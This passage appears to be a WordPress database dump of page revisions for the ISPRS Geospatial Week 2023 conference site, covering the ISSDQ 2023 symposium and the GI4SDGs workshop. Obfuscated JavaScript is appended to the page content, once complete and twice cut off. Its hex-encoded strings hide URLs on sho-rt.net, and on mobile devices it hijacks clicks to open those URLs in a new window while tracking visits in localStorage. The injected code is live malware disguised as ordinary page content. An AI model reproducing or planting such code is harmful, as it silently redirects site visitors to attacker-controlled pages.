Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','ISSDQ  2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis','','inherit','closed','closed','','2798-revision-v1','','','2022-10-14 16:43:21','2022-10-14 16:43:21','',2798,'https://gsw2023.com/?p=2811',0,'revision','',0),
(2812,1,'2022-10-14 16:44:52','2022-10-14 16:44:52','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2802\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Spatial data quality concerns with the reliability, confidence and trustworthiness of spatial data and their fitness for use. In the new era of spatial big data, IoT, smart city, ubiquitous spatial information systems and volunteered data produced using space-borne, areal and geo-sensors as well as human sensors in the phases of collection, fusion and leveraging artificial intelligence for spatial information extraction, and modeling, the issue of spatial data quality and uncertainty assessment requires more attention than ever before. Spatial data quality and uncertainty assessment/modeling are integrated components of spatial information systems main functionalities in measuring, mapping, managing, modeling and monitoring. The 12<sup>th</sup> International Symposium on Spatial Data Quality (ISSDQ 2023) will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single-track symposium of keynote and oral presentations as well as poster sessions and a panel discussion in the context of the ISPRS Geospatial Week.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h1><strong>CHAIRES</strong></h1>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"51\"][/vc_column_inner][/vc_row_inner][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Spatial data quality in space and time,</strong></h6>\n</li>\n<li>\n<h6><strong>Leveraging artificial intelligence in spatial data analysis and quality assessment,</strong></h6>\n</li>\n<li>\n<h6><strong>Collaborative spatial data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Uncertainty modeling, assessment and propagation in spatial analyses</strong></h6>\n</li>\n<li>\n<h6><strong>Error assessment and propagation in digital terrain modeling</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent methodologies to integrate and assess spatial data and spatial analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Smart spatial data infrastructures, land administration systems, cadastral surveying and mapping, BIM and their quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Interoperability issues in spatial data analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessing big spatial data in spatial information science</strong></h6>\n</li>\n<li>\n<h6>Spatial and spatio-temporal statistics methods and th<strong>eir uncertainty assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessment of UBGI/UBGIS, GSN, autonomous driving, smart city, multidimensional GIS, UAV, marine GIS, disaster management, and real time spatial data collections, collation and processing</strong></h6>\n</li>\n<li>\n<h6><strong>Harmonization of spatial information models and standards</strong></h6>\n</li>\n<li>\n<h6><strong>Matching the spatial data quality of combining multiple datasets</strong></h6>\n</li>\n<li>\n<h6><strong>Increasing spatial data quality through fusion</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning spatial data quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality assessment of transferability</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality visualization</strong></h6>\n</li>\n<li>\n<h6><strong>Web GIS data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor-based data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent GIS</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2803\" img_size=\"1200x800\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Bryan C. Pijanowski, University of Purdue, US.</strong></h6>\n</li>\n<li>\n<h6><strong>Christophe Claramunt, Naval Academy Research Institute, France</strong></h6>\n</li>\n<li>\n<h6><strong>Giles Foody, Nottingham University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Qiming Zhou, Baptist University, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Mir Abolfazl Mostafavi, Laval University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Nico vande Weghe, Ghent University, Belgium</strong></h6>\n</li>\n<li>\n<h6><strong>Alfred Stein, Twente University, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>John W.Z. Shi, The Hong Kong Polytechnic University, </strong></h6>\n<h6><strong>Hong Kong, China</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, TU Wien, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Jamal Jokar Arsanjani, Aalborg University, Denmark</strong></h6>\n</li>\n<li>\n<h6><strong>Ana-Maria Raimond, IGN, France</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Blachowski, Warsaw University, Poland</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Mojgan Jadidi, York University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Hossein Chavoshi, University of Life Science, Norway</strong></h6>\n</li>\n<li>\n<h6><strong>Robert G. Pontious, Clark University, US</strong></h6>\n</li>\n<li>\n<h6><strong>Alexis Comber, Leeds University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Bahareh Kalantar, Riken, Japan</strong></h6>\n</li>\n<li>\n<h6><strong>Nicholas Hamm, Nottingham University China Campus, China</strong></h6>\n</li>\n<li>\n<h6><strong>Firoozeh Karimi, North Carolina A &amp; T, US</strong></h6>\n</li>\n<li>\n<h6><strong><a href=\"mailto:Mingshu%20Wang,%20Glasgow%20University,%20UK%20%20.ac.uk\">Mingshu Wang, Glasgow University, UK </a></strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Istanbul Technical University, Turkey</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria, South Africa</strong></h6>\n</li>\n<li>\n<h6><strong>Mei-Po Kwan, Chinese University of Hong Kong, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Cidalia Fonte, University of Coimbra, Portugal</strong></h6>\n</li>\n<li>\n<h6><strong>Bin Jiang, University of Galve, Sweden</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"8\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img src=\"https://gsw2023.com/wp-content/uploads/2022/10/m4-300x180.jpg\" alt=\"\" width=\"300\" height=\"180\" class=\"alignnone size-medium wp-image-2805\" /></p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\n<h6 style=\"text-align:justify; color:black;\"><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the ISPRS IJGI and Geospatial information Science (GSIS) journals. The papers being accepted after the peer-review process of the journal will appear in a special issue of the journals dedicated to this symposium. </strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','ISSDQ  2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis','','inherit','closed','closed','','2798-revision-v1','','','2022-10-14 16:44:52','2022-10-14 16:44:52','',2798,'https://gsw2023.com/?p=2812',0,'revision','',0),
(2813,1,'2022-10-14 16:46:08','2022-10-14 16:46:08','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\n<h5 style=\"text-align:justify; color:black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\n<h5 style=\"text-align:justify; color:black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop will concentrate on the following topics:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of geospatial information-enabled SDGs;</strong></h6>\n<h6><strong>⦁ SDGs monitoring examples with geospatial perspective;</strong></h6>\n<h6><strong>⦁ Definition and modeling of geospatial essential variables for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Algorithms and methods for deriving geospatial essential variables, e.g., machine learning, big data analytics, cloud computing and other technologies;</strong></h6>\n<h6><strong>⦁ Global mapping initiatives and progresses at national and international levels;</strong></h6>\n<h6><strong>⦁ Integrating crowd-sourced data and VGI with geospatial data for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Developments and applications of geospatial knowledge service and collaborative platforms to meet SDGs assessment and monitoring;</strong></h6>\n<h6><strong>⦁ Ethical use of geospatial data and SDGs</strong></h6>\n<h6><strong>⦁ Other related topics.</strong></h6>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop plans to have the following four technical sessions:</strong></h5>\n<h6><strong>⦁ Session 1: Assessing SDGs progress by integrating geospatial and statistical information</strong></h6>\n<h6><strong>⦁ Session 2: Extracting Geospatial Information for SDGs</strong></h6>\n<h6><strong>⦁ Session 3: Monitoring SDGs with geospatially essential variables</strong></h6>\n<h6><strong>⦁ Session 4: ISPRS Scientific Program GI4SDGs: Progress and Collaboration</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>Workshop Chairs</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"48\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee</strong></h5>\n<p>⦁ Yifang Ban, KTH Royal Institute of Technology, Sweden<br />\n⦁ Maria Antonia Brovelli, Politecnico di Milano, Italy<br />\n⦁ Silvana Philippi Camboin, Universidade Federal do Paraná: Curitiba, Brazil<br />\n⦁ Jun Chen, National Geomatics Center of China, China<br />\n⦁ Laurent Durieux, GEO secretariat, France<br />\n⦁ Hongchao Fan, Norwegian University of Science and Technology, Germany<br />\n⦁ Gregory Giuliani, University of Geneva, Geneva, Switzerland<br />\n⦁ Songnian Li, Toronto Metropolitan University, Canada<br />\n⦁ Marguerite Madden, University of Georgia, USA<br />\n⦁ Lucy W. Mburu, College of Technology, KCA University, Kenya<br />\n⦁ Terje Midtbø, Norwegian University of Science and Technology, Norway<br />\n⦁ Jon Mills, Newcastle University, UK<br />\n⦁ Petros Patias, Aristotle University, Greece<br />\n⦁ Daniele Oxoli, Politecnico di Milano<br />\n⦁ Shu Peng, National Geomatics Center of China, China<br />\n⦁ Aurélie Sand, Centre National d\'Etudes Spatiales, France<br />\n⦁ Hao Wu, National Geomatics Center of China, China<br />\n⦁ Alexander Zipf, Heidelberg University, Germany[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 